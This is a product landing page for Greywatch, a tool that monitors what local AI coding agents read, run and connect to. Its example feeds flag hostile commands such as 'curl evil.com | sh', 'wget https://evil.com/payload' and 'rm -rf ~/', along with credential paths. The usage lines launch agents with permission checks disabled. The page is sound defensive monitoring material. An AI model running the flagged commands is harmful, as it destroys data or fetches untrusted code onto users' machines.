Want to know what your agent is doing?

Kernel-level visibility for AI agents.

$ curl -fsSL https://raw.githubusercontent.com/GreyhavenHQ/greywall/main/install.sh | sh

One install, then prefix any local agent with greywatch. Works on Linux and macOS.

GreyProxy conversations view listing every conversation the agent has runGreyProxy conversations view showing the agent's full system promptGreyProxy conversations view showing every tool call and action the agent madeGreyProxy conversations view showing the prompts of the agent's subagentsGreyProxy dashboard showing total requests and live traffic statsGreyProxy domain rules configuration showing allow and deny policies per sourceGreyProxy activity log showing real-time TCP connections with status, source, destination, and duration

Every conversation your agent runs, captured and ready to inspect.

The act of verification creates trust.

Greywatch shows the attempted reads, writes, commands, and connections as they happen, so nothing the agent does stays hidden from you.

How to run it.

Greywatch ships inside Greywall. Install Greywall once and you get the greywatch command, a watch-mode alias that runs any agent with the live activity feed and blocks nothing.

1. Install

curl -fsSL https://raw.githubusercontent.com/GreyhavenHQ/greywall/main/install.sh | sh

2. Watch any agent

greywatch -- claude --dangerously-skip-permissions
greywatch -- codex --yolo
greywatch -- opencode

greywatch is an alias for greywall --watch. Same agent, same flags. It streams a live activity feed and changes nothing about how the agent runs.

Compatibility

Works with every agent.

Greywatch sits under the agent process. If the tool runs locally, it runs inside the same observability and network boundaries without agent-specific setup.

Visibility

Every layer, in plain view.

Greywatch surfaces every file the agent opens, every host it connects to, and every command it runs, on whichever platform you work. It is permissive by default, so nothing is blocked until you decide otherwise.

Filesystem activity

~/my-project/write
src/write
package.jsonread
node_modules/read
~/shared-lib/read
~/.ssh/id_rsaflagged
~/.envflagged
~/.aws/credentialsflagged

Every path the agent opens shows up in the feed, marked read or write. Sensitive paths (SSH keys, .env files, cloud credentials) are flagged so they catch your eye the moment they are touched.

Network activity

Network namespace + TUN capture
bwrap --unshare-net \
tun2socks -device tun0 \
-proxy socks5://localhost:43052
curl https://api.anthropic.comTUN → PROXY → LOGGED
npm install lodashTUN → PROXY → LOGGED
wget https://evil.com/payloadTUN → PROXY → FLAGGED
nc -z 10.0.0.1 22TUN → PROXY → FLAGGED

Traffic is routed through the TUN device and GreyProxy, so every outbound request is visible, even binaries that ignore proxy environment variables. Unusual destinations are flagged in the feed.

Command activity

LOGGEDgit commit -m "fix: types"
LOGGEDnpm install lodash
LOGGEDgit push origin main
FLAGGEDrm -rf ~/
FLAGGEDbash -c "curl evil.com | sh"

Greywatch surfaces every command attempt, inside pipes, chains, and nested shells too. Risky-looking ones are flagged in the feed so you notice them.

Session log

$ greywatch --log session.jsonl -- claude
{"t":"14:02:01","op":"read","path":"src/api.ts"}
{"t":"14:02:03","op":"connect","host":"api.anthropic.com:443"}
{"t":"14:02:05","op":"read","path":"~/.env","flag":"sensitive"}
{"t":"14:02:06","op":"exec","cmd":"npm install lodash"}

Every session is written to a complete, timestamped log via eBPF tracing. Grep it, replay it, or pipe it into your own tooling.

Your rules, opt-in. Greywatch is permissive by default and blocks nothing out of the box. When you want tighter limits, add your own allow and deny rules for directories, domains, and commands. The default stays out of your way; the rules are there the moment you need them.

Under the hood

How Greywatch sees everything.

Greywatch traces the agent from below. No agent cooperation, no instrumentation, no changes to how it runs. Each layer captures a different signal and feeds the same activity feed.

eBPF Monitoring

Syscalls

Traces syscall exits in real time. Every read, write, command, and connection the agent makes is captured at the kernel boundary with full context: process, path, and result.

Process tracing

Filesystem

Follows the agent and every child process it spawns, so filesystem access is captured no matter how deep the process tree goes.

Network namespace

Routing

Places the agent in its own network namespace so all of its traffic can be routed through the capture proxy. The agent reaches the network exactly as before.

TUN + SOCKS5 Proxy

Network

Transparent network capture via a TUN device. Every TCP/UDP connection is surfaced with its destination and status, even binaries that ignore proxy env vars.

Graceful degradation. Greywatch checks the kernel features available on the host and enables the tracing layers it can support. Run greywatch --linux-features to inspect the active set.

Plugin SDK · Beta

Coming soon.

We're building a plugin layer on top of Greywatch for teams that need custom policy logic and shared operational controls.

Smart escalation

A model-backed heuristic watches the activity feed and surfaces the attempts you should look at first.

Custom feed plugins

Heuristics as code. Highlight, tag, or alert on whatever context you care about.

Model Council

A panel of models reviews ambiguous activity and flags what deserves a closer look.

Token-saving MITM

Cache, redact, and rewrite LLM traffic. Smaller bills.

Enterprise controls

SSO, audit trails, shared dashboards, managed deployments.

We built it for ourselves, then open-sourced it.

Greywatch was built by Greyhaven, where we build custom sovereign AI solutions for enterprises. We needed real-time visibility into what agents were doing inside client environments, so we built it.

It runs in production deployments today. We open-sourced it because the layer that watches the agent should not depend on the company selling the model.

Need the rest of the system?

Greywatch is one layer in a larger deployment model. For teams that need private model hosting, workflow design, and contained end-to-end systems, Greyhaven builds the surrounding infrastructure.

Talk to our team

Frequently asked.

Greywatch is a command-line tool that wraps an AI coding agent in a local observability layer. Prefix the agent command with greywatch -- and you get a live feed of every file it reads or writes, every command it runs, and every network connection it opens. It is observation only: Greywatch never blocks, denies, or sandboxes anything. It shows you what the agent does so you can see for yourself. Works on Linux and macOS.

Prefix the command you already use with greywatch --: greywatch -- claude, greywatch -- opencode, or any other local CLI agent. No config file, no Docker image, no agent-specific plugin. Greywatch runs the agent immediately and streams every read, write, command, and outbound request to a live activity feed.

Greywatch is permissive by default. Out of the box it watches everything and blocks nothing, so the agent runs exactly as it would on its own. When you want tighter limits, you can add your own rules for the directories, domains, and commands you care about. You decide whether anything is enforced, and nothing is until you say so.

Containers isolate software, but they separate the agent from the local toolchain and working copy you actually need, and they give you isolation without visibility. Greywatch keeps the agent in your normal local environment and gives you a live feed of everything it touches: reads, writes, outbound requests, command attempts. It is the visibility a container does not give you.

Yes. On macOS, Greywatch observes the agent through the Endpoint Security log stream and routes outbound traffic through the GreyProxy activity feed. Linux has more tracing layers available, but the macOS path provides the same observability story using built-in OS facilities.

On Linux, eBPF monitoring needs kernel 4.15, and the network proxy works on any kernel. On macOS, Greywatch uses the built-in Endpoint Security facilities, with no extra dependencies. Greywatch detects what is available on the host and enables the tracing layers it can support. Run greywatch --linux-features or greywatch check to inspect the result.

Greywatch works with local CLI agents that run as normal processes on your machine: Claude Code, Codex, Cursor, Aider, Goose, Amp, Gemini CLI, Cline, OpenCode, Copilot, and similar tools. Because Greywatch observes from below the agent, support does not depend on vendor-specific integrations.